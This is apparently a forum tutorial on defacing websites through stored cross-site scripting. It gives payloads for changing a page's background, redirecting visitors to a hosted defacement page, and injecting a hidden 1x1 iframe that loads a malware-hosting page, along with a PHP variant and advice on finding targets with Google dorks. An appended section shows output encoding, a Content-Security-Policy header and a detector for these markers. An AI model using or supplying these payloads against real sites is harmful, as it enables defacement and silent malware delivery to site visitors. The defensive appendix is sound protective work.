How to deface a website with Cross-Site Scripting

I am explaining this for educational purposes only.
Defacing is one of the most common things a hacker does after finding a vulnerability in a website.
Defacing means changing the content of the website to the hacker's content.
Most of the time, attackers use this technique to inform the admin about the vulnerability.

I have some of the easiest methods to deface XSS-vulnerable sites.

1 - Script for changing the background Color of a website:
<script>document.body.bgColor="Black";</script>

Use this in your target website as:

Code:
http://www.site.com/<script&...y.bgColor="red";</script>

2 - Script for changing the background image of a website:

Code:
<script>document.body.background="http://your_image.jpg/";</script>

3 - Defacement Page with Pastehtml:
You just need to upload some defacement page to pastehtml.com and get the link.

When you find an XSS-vulnerable site, insert the script as:

Code:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.


4 - Defacing with iframe Injection

What is an IFrame Injection?


Using the iframe tag, attackers inject links to malware-hosting websites into popular websites through cross-site scripting. An iframe is a tag used to insert the contents of one webpage inside another; in an invisible iframe injection, that frame is hidden from the visitor. So when the usual visitors of the popular site open it, they are redirected to the malware-hosting website.

The malware is loaded onto your computer, and now you are infected.
Using iframe injection, an attacker can inject advertisements into other websites, insert links to malware-infected sites, redirect to malware-infected sites and more.

Iframe Injection Tutorial:

1. Attackers find vulnerable websites using Google dorks.
2. They test the vulnerability by inserting an iframe tag through the URL.
3. They insert the malicious iframe code into the webpage.

For example, the attacker can insert this code using the URL:


Code:
<iframe src="http://malwarewebpages/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>




For php webpages:

Code:
echo "<iframe src=\"http://malwarewebpages/web.html\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";




There are more methods of defacement.

Note: You can deface only sites vulnerable to persistent XSS.

jack sparrow
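
Added example, not part of the original post: every snippet above depends on the site writing stored input into a page without encoding it. The code below shows that vulnerable pattern beside the output-encoding fix, a Content-Security-Policy value as a second layer, and a simple audit for the script and hidden-iframe markers shown on this page. The function names, the CSP value and the benign sample are illustrative assumptions.

```javascript
// Added defensive example; function names and the CSP value are illustrative assumptions.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for HTML element content or a quoted attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable pattern: stored user input is concatenated into markup unchanged.
function renderCommentUnsafe(text) {
  return '<div class="comment">' + text + '</div>';
}

// Hardened pattern: the same input is encoded at output time, so it renders as text.
function renderComment(text) {
  return '<div class="comment">' + escapeHtml(text) + '</div>';
}

// Second layer: with no 'unsafe-inline', injected inline <script> is refused, and
// frame-src 'none' stops any <iframe> from loading, even if encoding is missed somewhere.
const CSP_HEADER = "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'";

// Audit rendered or stored HTML for the markers this page describes.
function findInjectionIndicators(html) {
  const findings = [];
  if (/<script\b/i.test(html)) findings.push('script-tag');
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const hidden = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(tag);
    const tiny = /\bwidth\s*=\s*["']?[01]\b/i.test(tag) && /\bheight\s*=\s*["']?[01]\b/i.test(tag);
    findings.push(hidden || tiny ? 'hidden-iframe' : 'iframe');
  }
  return findings;
}

// Inputs taken from the snippets on this page, treated here as stored "comments".
const SAMPLES = [
  '<script>document.body.bgColor="Black";</script>',
  '<iframe src="http://malwarewebpages/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>',
  'Nice article, thanks!', // constructed benign input
];

// Left column: findings in the unsafe rendering. Right column: findings after encoding.
for (const s of SAMPLES) {
  console.log(findInjectionIndicators(renderCommentUnsafe(s)), findInjectionIndicators(renderComment(s)));
}
```

The audit is a coarse triage aid for content already in a database; encoding at output time and the CSP header are what actually prevent the injected markup from running.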


Copyright 2018 Deoffuscated.
